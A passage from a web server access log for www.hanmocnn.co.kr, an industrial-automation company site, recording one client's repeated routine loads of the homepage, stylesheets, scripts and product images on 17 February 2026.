222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:48:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10423] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:51:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:13:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20913] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:04:14:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20913] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:51 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:16:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:07:16:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:07:28:13 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 